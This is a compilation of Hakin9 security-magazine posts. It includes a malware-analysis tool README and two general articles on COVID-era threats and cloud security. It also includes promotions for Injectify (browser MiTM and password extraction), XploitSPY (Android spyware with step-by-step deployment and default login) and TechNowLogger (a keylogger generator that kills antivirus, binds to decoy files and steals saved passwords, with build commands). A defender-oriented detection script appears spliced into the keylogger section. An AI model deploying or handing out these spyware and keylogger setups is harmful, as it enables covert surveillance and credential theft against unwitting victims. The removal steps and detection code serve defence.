sudo apt-get install apt-transport-https
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt-get update && sudo apt-get install elasticsearch
sudo service elasticsearch start

You can also install manually by following this documentation

Additionally, you can set up a full ELK stack for visualization and data analysis purposes. It is not necessary for using this tool.

Installing radare2

It's important to install radare2 from the repo, and not your package manager. Package manager versions don't come with all the bells and whistles required for inhale.

git clone https://github.com/radare/radare2
cd radare2
sys/install.sh

Installing Yara

Documentation

sudo apt-get install automake libtool make gcc
wget https://github.com/VirusTotal/yara/archive/v3.10.0.tar.gz
tar xvzf v3.10.0.tar.gz
cd yara-3.10.0/
./bootstrap.sh
./configure
make
sudo make install

If you get any errors about shared objects, try this to fix it.

sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig

Installing binwalk

It's most likely best to simply install binwalk from the repo.

git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
sudo python3 setup.py install

More information on installing additional features for binwalk is located here.

Usage

Specify the file you are scraping by type:

-f infile    
-d directory
-u url
-r recursive url

Other options:

-t TAGS        Additional Tags
-b             Turn off binwalk signatures with this flag
-y YARARULES   Custom Yara Rules
-o OUTDIR      Store scraped files in specific output dir (default:./files/<date>/)
-i             Just print info, don't add files to database

Examples

Running inhale.py will perform all of the analysis on a given file/directory/url and print it to your terminal.

View info on /bin/ls, but don't add to the database

python3 inhale.py -f /bin/ls -i 

Add directory 'malwarez' to database

python3 inhale.py -d malwarez

Download this file and add to the database

python3 inhale.py -u https://thugcrowd.com/chal/skull

Download everything in this remote directory, tag it all as "phishing":

python3 inhale.py -r http://someurl.com/opendir/ -t phishing

PROTIP: Use this Twitter hashtag search to find interesting open directories that possibly contain malware. Use it at your own risk.

Yara

You can pass your own yara rules with -y, this is a huge work in progress and almost everything in "YaraRules" is from https://github.com/kevthehermit/PasteHunter/tree/master/YaraRules. Shoutout @KevTheHermit

Querying the Database

Use db.sh to query (Soon to be a nice script)

db.sh *something* | jq .

Data Model

The following is the current data model used for the elasticsearch database. Not every one of these will be used for every given file. Any r2_* tags are typically reserved for binaries of some sort.

Name           Description
filename       The full path of the binary
file_ext       The file extension
filesize       The file size
filetype       Filetype based on magic value. Not as reliable as binwalk signatures.
md5            The file's MD5 hash
sha1           The file's SHA1 hash
sha256         The file's SHA256 hash
added          The date the file was added
r2_arch        Architecture of the binary file
r2_baddr       The binary's base address
r2_binsz       The size of the program code
r2_bits        Architecture bits - 8/16/32/64 etc.
r2_canary      Whether or not stack canaries are enabled
r2_class       Binary class
r2_compiled    The date that the binary was compiled
r2_dbg_file    The debug file of the binary
r2_intrp       The interpreter that the binary calls if dynamically linked
r2_lang        The language of the source code
r2_lsyms       Whether or not there are debug symbols
r2_machine     The machine type, usually means the CPU the binary is for
r2_os          The OS that the binary is supposed to run on
r2_pic         Whether or not there is Position Independent Code
r2_relocs      Whether or not there are relocations
r2_rpath       The run-time search path - if applicable
r2_stripped    Whether or not the binary is stripped
r2_subsys      The binary's subsystem
r2_format      The binary format
r2_iorw        Whether ioctl calls are present
r2_type        The binary type, whether or not it's an executable, shared object etc.
yara           Contains a list of yara matches
binwalk        Contains a list of binwalk signatures and their locations in the binary
tags           Any user-defined tags passed with the -t flag.
url            The origin url if a file was remotely downloaded
urls           Any URLs that have been pulled from the binary

Solutions to Issues

There are some known issues with this project (mainly to do with versions from package managers), and here I will track anything that has a solution for it.

ElasticSearch index field limit

If you get an error like this:

elasticsearch.exceptions.RequestError: RequestError(400, 'illegal_argument_exception', 'Limit of total fields [1000] in index [inhaled] has been exceeded')

You may have an older version of Elasticsearch. You can upgrade, or you can increase the field limit with this one-liner.

curl -XPUT 'localhost:9200/inhaled/_settings' -H 'Content-Type: application/json' -d'{ "index" : { "mapping" : { "total_fields" : { "limit" : "100000" }}}}'

Future Features

  • Re-doing the bot plugin for Discord / Matrix
  • Additional binary analysis features - pulling import/export tables, hashing of specific structures in the header, logging all strings, etc.
  • Checking if the file is the database before adding. This feature was removed previously due to specific issues with older versions of ES.
  • Configuration options for requests such as user-agent, timeout, proxy, etc.
  • Dockerization of this entire project.

Contribution

PRs are welcome! If you want to give specific feedback, you can also DM me @netspooky on Twitter.

Thanks

I'd like to thank everyone who helped to test this tool with me. I'd also like to thank Plazmaz for doing an initial sweep of the code to make it a bit neater.

Greetz to: hermit, plazmaz, nux, x0, dustyfresh, aneilan, sshell, readme, dnz, notdan, rqu, specters, nullcookies, ThugCrowd, and everyone involved with ThreatLand and the TC Safari Zone.


More: https://github.com/netspooky/inhale

The post Inhale - A malware analysis and classification tool. appeared first on Hakin9 - IT Security Magazine.


Cybersecurity In The Time Of Coronavirus by Jessica Bennett


When the year began, none of us imagined that in just under three months our lives would change so drastically. Due to the Coronavirus pandemic, life as we knew it has changed entirely. And it is affecting many different aspects of life. However, here we are only going to be talking about the kind of havoc the pandemic has on cybersecurity. 

The matter of cybersecurity is a delicate one, with new malware and threats endangering the security of websites on a daily basis. With the changes brought on in our lives by the Coronavirus threat, the cybersecurity sector is also seeing the rise of new types of threats against businesses and individuals. 

Coronavirus Threats: What Should We Prepare For?

Thanks to the social distancing and quarantine measures taken across the world, most of us are working from home. This increases the risk to business data and threatens the integrity of the business. Every home PC, laptop and mobile device that is being used to access company data is not as secure as the company's own devices. As a result, hackers have an easier entry point to the company database, and they can manipulate the database from there.

Added to this, there is another threat that uses the global pandemic fear to manipulate users. Scam emails and messages containing links are being circulated among users, disguised as emails and messages from organizations such as WHO (World Health Organization) and CDC (The Centers for Disease Control and Prevention). The moment the users click on the links provided in these mails, malicious software is downloaded onto the system.

Both types of threats are exploiting the pandemic situation and the panic about it. In addition, there is now Coronavirus-themed malware designed to wipe the entire system. According to the source, this malware is designed to destroy rather than act as ransomware. All in all, the Coronavirus situation has proven to be harmful not only to our health, but to the cyber world as well.

COVID-19: The Work from Home Threat

The firewalls and protective protocols used for a home internet system are adequate for personal use. However, these personal web access points are not equipped with the proper safety tools to support the huge demands of a work from home operation. 

A company's access points, on the other hand, are equipped with multiple safety measures to reduce the chances of cyber attacks and keep the company data secure. But when that data is being accessed from home networks on a daily basis for at least a three-week period, the danger becomes very real.

Every vulnerable device used to access the data can be considered a point of entry for the hackers. This increases the chances of an attack on the database. The main reason why this kind of cyber threat has become a focal point is the time crunch. Usually, companies require months or years to analyze, develop, test and deploy solutions for such cyber risks. However, this time around, they only had a few days' warning before they all had to go into quarantine.

With the world economy already in danger, these kinds of data breaches can prove to be fatal. And that’s why it is necessary that both the company and employees working from home take some extra precautions while accessing the company data from their home system.

  • Analyzing The Security Vulnerabilities

Analyzing the security instability beforehand is necessary for any company. This way, they have a better chance of understanding the weak points and can take precautionary steps. 

  • Drawing Up A Detailed Security Protocol

A precise security protocol for working from home needs to exist whether there is urgency or not. This is the document workers would refer to when they are facing any kind of confusion regarding enhancement of security. 

  • Using Only Updated Software On The System

This one is for the employees. 

It is imperative to use the latest versions of the apps when working from home. These revised versions come with proper security patches and help secure the databases against online attacks. So before you start working from home, install the latest version of your system. 

  • Securing The Home Network Access Point

The main difference between a home network and an office network is the level of online safety. It is crucial that the access points of the home network are secured and that no one else can hack it. This way, employees can reduce the chances of anyone else snooping around in their files. 

  • Using VPN

Using a virtual private network can help users increase security levels when working from home. Corporate VPNs will protect the users from phishing and malware attacks better than anything else. 

If we consider it, we would understand that companies are a lot better equipped to handle a data breach, if it happens. But what happens when an individual is manipulated because of their panic and fear?

The Panic Manipulation: Threats Faced By Individuals

If the fear and panic over the global pandemic was not enough, now there is a new cybersecurity threat aimed at those who are trying to stay safe during this trying time. 

Using the very basic method of scam emails, hackers are sending emails with malicious links camouflaged as emails from credible sources such as WHO and CDC. The moment users click on this link, malicious software is installed on the system ready to harm it. 

These phishing emails are succeeding for only one reason, and that is - the global panic. People want to find out all they can about this disease and how to save themselves from it. And that’s why people are clicking on the links that promise to provide them information on that. This is nothing but a sadistic manipulation of the users and their emotions. 

But is there any way of preventing these attacks? 

  • Be Extra Careful About Opening Links From Emails

The scary part about these phishing attacks is the fact that more often than not these emails look legitimate. For an inexperienced user, figuring out the character of any email is a pretty tough job. And that’s why the users should be wary of any email that provides them with a direct link or CTA button to another process. In this case, rather than clicking on the link provided on the email, the users should type the name of the website on the search engine and check it out to see what the matter is about.

  • Get Your Coronavirus Information Straight From The Websites

We have already mentioned before that the users are going to receive many emails telling them to download a file or visit a website from the mail to get the latest information on the Coronavirus situation. The best a user can do in this case is to get their information straight from the source, rather than an email.

  • Learn The Signs Of A Phishing Email

It is not about becoming an expert on phishing scams. But learning the basic signs of a phishing scam can really benefit users and help them be safe online during this pandemic age.

  • Do Not Reveal Any Personal Data

Even if the user has accidentally landed on the phishing website, they don’t have to give any type of personal information such as email, physical address, financial information, etc. This way the personal information will stay safe even if you click on the link accidentally. 

Wrapping Up

Even though it is primarily a healthcare problem, the COVID-19 crisis has proven to be catastrophic in almost all areas of human life. There are some companies that are working on solutions to these security breaches. Hopefully these solutions will take effect before any type of big data breach takes place.


About the Author:

Jessica is an individual contributor for various leading publications. Writing about technology, design and the latest innovations is her primary knack. She also works for Unified Infotech, a technology service provider serving startups and enterprises. While not writing, Jessica can be found chilling with her martini.

Image Courtesy: https://www.helpnetsecurity.com/2020/03/18/healthcare-cybersecurity-coronavirus/

Reference:

https://www.govtech.com/blogs/lohrmann-on-cybersecurity/how-is-covid-19-creating-data-breaches.html

https://www.newelectronics.co.uk/electronics-blogs/covid-19-cyber-security-threat-to-impact-businesses/225701/

https://ciso.economictimes.indiatimes.com/news/cybercriminals-exploiting-public-fear-of-rising-covid-19/74621845

https://www.weforum.org/agenda/2020/03/covid-19-cyberattacks-working-from-home/

https://www.consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams

https://us.norton.com/internetsecurity-online-scams-how-to-protect-against-phishing-scams.html

The post Cybersecurity In The Time Of Coronavirus by Jessica Bennett appeared first on Hakin9 - IT Security Magazine.

Injectify - Perform advanced MiTM attacks on websites with ease.


Injectify is a web-based MiTM tool, similar to BeEF (although completely unrelated in terms of source code). It uses modern web technologies such as ReactJS, Redux, Typescript and Webpack.

What can it do?

  • ⚡ Create a reverse Javascript shell between the victim and the attacker.
  • 👻 PageGhost - see what's on the victim's screen and interact with it in realtime
  • 🔧 Highly integrated Module platform, with a high-level API
  • 📑 Data extraction API - record custom data
    • 🔐 Extracts and logs saved passwords from the browser.

Creating a MongoDB database

Tip: For simplicity and compatibility, we recommend using mLab with the Free plan. If you intend to have a lot of traffic you can also setup a dedicated database

Creating an mLab database

  1. Head over to mLab and create an account. Make sure to verify your email, if you don't then it won't allow you to create a database:

Click on Create new in the upper right corner

Select Sandbox and then click Continue

New deployment

Select your preferred region and click Continue

Enter injectify as the database name, click Continue and then Submit order

Click on your new database and select Users and then Add database user

Add database user

Choose a username and password and click Create (make sure read-only is left unchecked)

Creating a GitHub application

Note: Injectify uses a GitHub SSO based system for authentication, instead of locally managing credentials. This makes it more secure and adds the ability to utilise GitHub gists, repos etc.

Head over to GitHub.com and create an account if you haven't already.

Create a new GitHub application and specify the following values:

Field                       Value
Application name            any
Homepage URL                any
Application description     any
Authorization callback URL  https://injectify.samdd.me

What it should look like:

GitHub Applications page

Configuration

Tip: In order to actually use Injectify, you first have to setup the configuration file. In the future, you'll be able to do this from the web interface.

Clone this repo

Navigate into the repo and copy server.config.example.js to server.config.js

Open server.config.js in a text-editor

Replace the GitHub client_id and client_secret values with those of your newly created application.

Replace the mongodb value with your newly created mLab URL (or dedicated MongoDB URI), in the format: mongodb://<dbuser>:<dbpassword>@XXXX.mlab.com:XXXX/injectify

Setting up the server

Note: This is where you actually install Injectify, you are required to have NodeJS pre-installed.

Prerequisites

Installing

Windows

npm i -g yarn
yarn global add typescript
yarn global add pm2
yarn run install:all
yarn run deploy

Linux

sudo npm i -g yarn
sudo yarn global add typescript
sudo yarn global add pm2
yarn run install:all
yarn run deploy

Success!

Injectify will now be running over at http://localhost:3000

DEMO:

See more at the official documentation site

More: https://github.com/samdenty/injectify

The post Injectify - Perform advanced MiTM attacks on websites with ease. appeared first on Hakin9 - IT Security Magazine.

XploitSPY is an Android Monitoring / Spying Tool


A cloud based Android Spying or Monitoring Tool, powered by NodeJS

NOTE: Read all steps carefully to setup XploitSPY as we keep changing them as per need

Features

  • GPS Logging
  • Microphone Recording
  • View Contacts
  • SMS Logs
  • Send SMS
  • Call Logs
  • View Installed Apps
  • View Stub Permissions
  • Live Clipboard Logging
  • Live Notification Logging (WhatsApp, Facebook, Instagram, Gmail and more ....)
  • View WiFi Networks (logs previously seen)
  • File Explorer & Downloader
  • Command Queuing
  • Built-In APK Builder

Prerequisites

  • Java Runtime Environment 9+
  • NodeJs
  • A Server

Installation on Heroku

Video Tutorial for Heroku Click Here

  1. Create an Account on Heroku
  2. Click Create New App in Heroku Dashboard
  3. Enter App Name and click on create an app
  4. Now install Heroku CLI on your Computer Instructions
  5. Now open your terminal and run the command git clone https://github.com/XploitWizer/XploitSPY
  6. It will download Latest codes for you in your PC
  7. Now change the directory to XploitSPY using the command cd XploitSPY
  8. Now Login into Heroku CLI using the command heroku login -i now enter your login details and hit Enter
  9. After Login run this command in terminal heroku git:remote -a appName here appName will be your app's name that you choose while creating the app.
  10. Now run the following commands in the terminal to install the buildpacks
    • heroku buildpacks:add heroku/jvm
    • heroku buildpacks:add heroku/nodejs
  11. Now run this command in your terminal: git push heroku master. If you are updating an existing app or face an error, run git push -f heroku master
  12. All done. It will take some time to complete; after that you can visit the domain shown in the terminal.

Installation on VPS or Server

Video Tutorial for VPS or Server Click Here

  1. Connect to your server via SSH
  2. Install JRE 9+
    • Debian, Ubuntu, Etc
      • sudo apt install openjdk-11-jre-headless
    • Fedora, Oracle, Red Hat, etc
      • sudo yum install java-11-openjdk-devel
    • Windows
      • click HERE for downloads
  3. Install NodeJS Instructions Here (If you can't figure this out, you shouldn't really be using this)
  4. install PM2
    • sudo npm install pm2 -g
  5. Clone this repository
    • git clone https://github.com/XploitWizer/XploitSPY.git
  6. Now change to the server directory and run these commands
    • npm install <- install dependencies
    • sudo pm2 start index.js <-- start the script
    • sudo pm2 startup <- to run XploitSPY on startup
  7. Default Username: admin & Default Password: password
  8. In your browser navigate to http://<SERVER IP or URL>

NOTE: XploitSPY now works only on port 80 for both web and client

It's recommended to run XploitSPY behind a reverse proxy such as NGINX

Happy Hacking

Disclaimer

XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool. XploitSPY is built for Educational purposes. Use at your own risk.


Made with ❤ By XploitWizer

Credits

Credits to D3VL for the original code base this repository is based on at L3MON


More: https://github.com/XploitWizer/XploitSPY

The post XploitSPY is an Android Monitoring / Spying Tool appeared first on Hakin9 - IT Security Magazine.

Top 7 Cloud Security Issues and How to Overcome Them by Gilad David Maayan


Cloud computing transforms the way companies store and share data, workloads, and applications. However, cloud environments also introduce a lot of new security threats and challenges, which often turn into easy marks for cybercriminals. This article reviews seven common security issues in cloud computing, including tips on how to overcome them.

What Is Cloud Security?

The goal of cloud security is to protect cloud-based infrastructure, data, and systems, from cyber attacks. Cloud security applies multiple levels of controls that mitigate DDoS attacks, support regulatory compliance, and protect customer data and privacy. Companies can create robust security environments by managing cloud security in one place.

The Difference Between On-Premises and Cloud Cyber Security

Cloud security and on-premises security differ in connectivity, required resources, and responsibilities, as explained in the table below.

Connectivity

  • On-Premises Security: based on individually managed security tools
  • Cloud Security: based on API-driven security tools

Responsibilities

  • On-Premises Security: the organization is responsible for the security
  • Cloud Security: both customers and cloud service providers are responsible for the security

Resources

  • On-Premises Security: the network perimeter is composed of static resources
  • Cloud Security: the network perimeter is distributed due to the usage of dynamic resources

7 Cloud Security Issues in Cloud Computing and How to Overcome Them

The following list reviews some of the most common risks cloud-based environments are facing, including tips on how to overcome them.

  1. Data ownership and accountability 

Cloud servers are usually located at multiple geographical locations. Each server stores the data of multiple users, in one place. The cloud provider has to restrict access to your data and maintain confidentiality by separating your data from that of others. The provider also needs to ensure that data marked for deletion is removed as soon as possible.

Cloud providers need to be clear about how they secure your data. This includes encryption types, authentication protocols, and monitoring and reporting policies. In addition, providers have to specify where your data is stored and whether the compliance laws of that location are different. You should keep tabs on any policy changes to ensure your data is secured.

  2. User privacy and secondary usage of data

You don’t always have full control over data stored in the cloud. As a result, your private data may be exposed and you won’t be able to prevent secondary usage of data. You also have to use many third-party integrations for cloud storage. These integrations are easy targets for hackers because they enable data sharing.

Verify the sharing settings of your cloud configuration and any third-party integrations you use. Conduct periodic checks of privacy policies to make sure that all services and products comply. In addition, make sure to include the required regulations in your Service-Level Agreement (SLA), since they may differ between cloud providers.

You can also use a Cloud Security Posture Management (CSPM) solution for securing cloud configurations. CSPM tools and processes enable you to proactively detect and prevent cloud security risks by focusing on compliance monitoring and security assessments across the entire cloud infrastructure. 

  3. DDoS attacks

The goal of a Distributed Denial of Service (DDoS) attack is to make a web server unavailable by overwhelming it with fake traffic. DDoS attacks can render a website useless for hours or days. This can result in a decrease in customer trust, revenue loss, and damage to brand authority.

Controlling DDoS attacks in cloud environments is a complex task because cloud computing is based on shared distributed resources and uses different virtualization technologies. 

You should invest in DDoS protection solutions that can protect against sophisticated DDoS threats at every network layer.

  4. Regulatory compliance

Cloud providers need to protect your data across different locations and take appropriate actions when needed. However, you are responsible for verifying that your data is compliant with local regulations, properly backed up, encrypted, and access-restricted. You need to migrate your data to another provider if you see that your current provider is not compliant.

  5. Infrastructure security

You often cannot monitor proprietary cloud systems or processes. As a result, you cannot ensure that any cloud-based software or hardware is properly configured and updated. In addition, you sometimes cannot define who has administrative access to your set-up.

Tiering your cloud architecture and isolating infrastructure components with network Access Control Lists (ACLs) can reduce authorization risks. You can also configure administrative privileges only to specific people to limit access to the network. You should perform a periodic risk assessment to verify that your security measures are working as expected.

  6. Disaster recovery

Disasters like power outages or natural disasters can prevent access to infrastructure. Outages can take a minute, an hour, several hours or even days. During that time you have no control over your most critical data. As a result, employees will not have access to systems and tools. In addition, there will be no data transmission until access is restored.

  7. Data loss

Many companies do not have enough visibility into what happens to their data in the cloud. Companies can easily lose data when multiple users work in the cloud at the same time. This is when the benefits of data sharing and collaboration become a security vulnerability. Risks such as password sharing, personal devices without any passwords, accidental file deletion are the main reason for data loss in the cloud.

Organizations need to invest in a cloud data loss prevention solution to prevent hackers from stealing sensitive information. You can use data loss prevention and disaster recovery tools, as well as dedicated systems to prevent malicious attacks. 

You should plan dedicated disaster recovery and business continuity strategies for cloud workloads. You also need to review your cloud provider data security options and request ongoing audit reports.

Conclusion

Robust cloud security is essential for companies that move their devices, data centers, and business processes to the cloud. Ensuring data security in the cloud is achieved through comprehensive security policies, backup and disaster recovery plans, and cloud security solutions. You should create your own security strategies and policies, and introduce only the practices and solutions that serve your network best.


About the Author: 

Gilad David Maayan is a technology writer who has worked with over 150 technology companies including SAP, Samsung NEXT, NetApp and Imperva, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership.

LinkedIn: https://www.linkedin.com/in/giladdavidmaayan/

The post Top 7 Cloud Security Issues and How to Overcome Them by Gilad David Maayan appeared first on Hakin9 - IT Security Magazine.

TechNowLogger - Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info


TechNowLogger is Keylogger Generator for Windows/Linux, which sends key-logs & screenshot via email with other juicy target info written in Python 3.

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

  • Works on Windows/Linux
  • Notify New Victim Via Email
  • Undetectable
  • Persistence
  • Sends Screenshot of Victim PC's Screen via email
  • Creates Executable Binary With Zero Dependencies
  • Create less size ~ 5mb payload with advance functionality
  • Obfuscates the Payload before Generating it, hence Bypassing a few more antivirus products
  • Generated Payload is Encrypted with base64, hence makes it extremely difficult to reverse engineer the payload
  • Function to Kill Antivirus on Victim PC and tries to disable the security
  • Awesome Colourful Interface to generate payload
  • On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
  • Distinguish Log Data on the Basis of Active Window Name (Check v1.3 Image for Better Understanding)
  • Able to add custom Icon to evil file (New Argument is Added in v1.3 & onward version)
  • Built-in Binder which can bind Keylogger to Any File [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service. (New Argument is Added in v1.4 & onward version)
  • Checks for an Already Running Instance on the System; if a running instance is found, then only the legitimate file is executed [Multiple Instance Prohibiter to avoid the Same Multiple Logs Email].
  • Attacker can Create/Compile for Both Windows/Linux OS Using Linux System, But Can only Create/Compile WindowsExecutable using Windows Machine
  • Retrieves Saved Passwords from victim System and sends it to Attacker.
Supported Retrieves, Tries to Retrieve Saved Passwords from :
Chrome Browser
WiFi

Note: A custom stealer is coded; it does not rely on LaZagne

Tested On

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Prerequisite

  • Python 3.X
  • Few External Modules

How To Use in Linux

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowlogger.git

# Navigate to technowlogger folder
$ cd technowlogger

# Installing dependencies
$ bash installer_linux.sh

*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
    * Click on custom install 
    * Select Path to : C:/Python37-32
    ### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

$ chmod +x technowgen.py
$ python3 technowgen.py --help

# Making Payload/RAT
$ python3 technowgen.py -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How To Use in Windows

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowlogger.git

# Go into the repository
$ cd technowlogger

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open technowgen.py in Text editor and Configure Line 12 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Getting Help Menu
$ python technowgen.py --help

# Making Payload/RAT
$ python technowgen.py -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico

How to Update

  • Run updater.py to Update Automatically or Download the latest Zip from this GitHub repo
  • Note: Git Must be Installed in order to use updater.py

Note:- Evil File will be saved inside dist/ folder, inside technowlogger/ folder

Available Arguments

  • Optional Arguments
Short Hand           Full Hand                          Description
-h                   --help                             show this help message and exit
-i INTERVAL          --interval INTERVAL                Time between reports in seconds. default=120
-t TIME_PERSISTENT   --persistence TIME_PERSISTENT      Becoming Persistent After __ seconds. default=10
-w                   --windows                          Generate a Windows executable.
-l                   --linux                            Generate a Linux executable.
-s                   --steal-password                   Steal Saved Password from Victim Machine [Supported OS : Windows]
-b file.txt          --bind LEGITIMATE_FILE_PATH.pdf    AutoBinder : Specify Path of Legitimate file. [Supported OS : Windows]

Note: Either -w/--windows or -l/--linux must be specified

  • Required Arguments
Short Hand     Full Hand              Description
               --icon ICON            Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
-e EMAIL       --email EMAIL          Email address to send reports to.
-p PASSWORD    --password PASSWORD    Password for the email address given in the -e argument.
-o OUT         --out OUT              Output file name.

New Screenshots:

Generating payload

Getting report

Retrieves & Sends Saved WIFI Password

  • Note: In order to use this feature, specify -s or --steal-password while creating keylogger

Debug Issues

Try to Run Offline Keylogger in order to test Offline Key logs capturing & Debug keylogger issues by running these commands:

Run test_key.py in both modes [Compiled & Raw] and figure out what the error is

Run it like this : python test_key.py

Also Compile it like this: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

After running it, Start typing something, Result will be displayed on the Command prompt after every 10 seconds

Offline keylogger's files are present in TestKeylogger Folder

Removing TechNowLogger in Windows:

Method 1:

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called svchost, right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
  • Restart the System.

Method 2:

  • Run "RemoveTechnowLogger.bat" in Infected System and then restart the PC to stop the current Running Evil File.

Removing TechNowLogger in Linux:

  • Open Autostart file with any text editor, Autostart File Path: ~/.config/autostart/xinput.desktop
  • Remove these 5 lines:
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Note: destination_file_name is the name of the evil file which you gave to your Keylogger using the -o parameter
  • Reboot your system and then delete the evil file stored at the path below
  • Destination Path, where the Keylogger is stored : ~/.config/xnput
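For defenders, the two removal sections above amount to a set of host indicators: on Windows, an HKCU Run value named svchost and an svchost.exe dropped in %APPDATA% (Roaming); on Linux, ~/.config/autostart/xinput.desktop with Name=Xinput and the ~/.config/xnput directory. The script below turns them into a host check. It is an added example, not part of TechNowLogger or the page; the function names and the constructed SAMPLE_AUTOSTART text are assumptions, and the registry read only runs on Windows.

```python
import os
import sys
from pathlib import Path

# Indicators of TechNowLogger persistence, taken from the removal steps above.
LINUX_AUTOSTART = Path("~/.config/autostart/xinput.desktop")
LINUX_PAYLOAD_DIR = Path("~/.config/xnput")
WIN_RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
WIN_RUN_VALUE = "svchost"          # Run-key value name the keylogger registers
WIN_PAYLOAD_NAME = "svchost.exe"   # dropped into %APPDATA% (the Roaming folder)

# Constructed copy of the five-line autostart entry quoted above, used as sample input.
SAMPLE_AUTOSTART = (
    "[Desktop Entry]\n"
    "Type=Application\n"
    "X-GNOME-Autostart-enabled=true\n"
    "Name=Xinput\n"
    'Exec="destination_file_name"\n'
)


def parse_desktop_entry(text: str) -> dict:
    """Minimal parser for the [Desktop Entry] section of a .desktop file."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_section = line == "[Desktop Entry]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip().strip('"')
    return entries


def desktop_entry_is_suspicious(entry: dict) -> bool:
    """True when the entry matches the xinput.desktop persistence described above."""
    return entry.get("Name") == "Xinput" and entry.get("Type") == "Application"


def linux_indicators(autostart_file, payload_dir) -> list:
    """Report the Linux autostart entry and payload directory, if present."""
    findings = []
    autostart_file = Path(autostart_file).expanduser()
    payload_dir = Path(payload_dir).expanduser()
    if autostart_file.is_file():
        entry = parse_desktop_entry(autostart_file.read_text(errors="ignore"))
        if desktop_entry_is_suspicious(entry):
            findings.append(f"{autostart_file}: Name=Xinput entry runs {entry.get('Exec', '?')}")
    if payload_dir.is_dir():
        findings.append(f"payload directory {payload_dir} exists")
    return findings


def windows_indicators(run_values: dict, appdata_dir) -> list:
    """Evaluate HKCU Run values and %APPDATA% for the Windows indicators.

    run_values maps Run-key value names to their commands and is passed in so
    the logic can be checked without a registry.  The genuine svchost.exe lives
    under System32 and needs no Run entry, so a Run value named svchost is
    itself the signal here.
    """
    findings = []
    cmd = run_values.get(WIN_RUN_VALUE)
    if cmd is not None:
        findings.append(f"HKCU Run value '{WIN_RUN_VALUE}' present: {cmd}")
    dropped = Path(appdata_dir) / WIN_PAYLOAD_NAME
    if dropped.is_file():
        findings.append(f"dropped file {dropped} exists")
    return findings


def read_hkcu_run_values() -> dict:
    """Enumerate the HKCU Run key into a dict (Windows only; {} elsewhere)."""
    if sys.platform != "win32":
        return {}
    import winreg  # only importable on Windows
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, WIN_RUN_KEY) as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            values[name] = str(data)
            i += 1
    return values


if __name__ == "__main__":
    hits = linux_indicators(LINUX_AUTOSTART, LINUX_PAYLOAD_DIR)
    appdata = os.environ.get("APPDATA")
    if appdata:
        hits += windows_indicators(read_hkcu_run_values(), appdata)
    print("\n".join(hits) if hits else "no TechNowLogger indicators found")
```

Run it as the user whose profile you are checking, since both persistence locations are per-user (HKCU and the home directory); a finding is a prompt to follow the removal steps above, and the Exec value or Run command it prints tells you which file to delete after the reboot.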

Video Tutorial

Contribute

  • All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.

TODO

  • Add New features
  • Contribute GUI Version

Contact

singhpushpender250@gmail.com


Support author: https://github.com/Technowlogy-Pushpender/technowlogger

The post TechNowLogger - Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info appeared first on Hakin9 - IT Security Magazine.
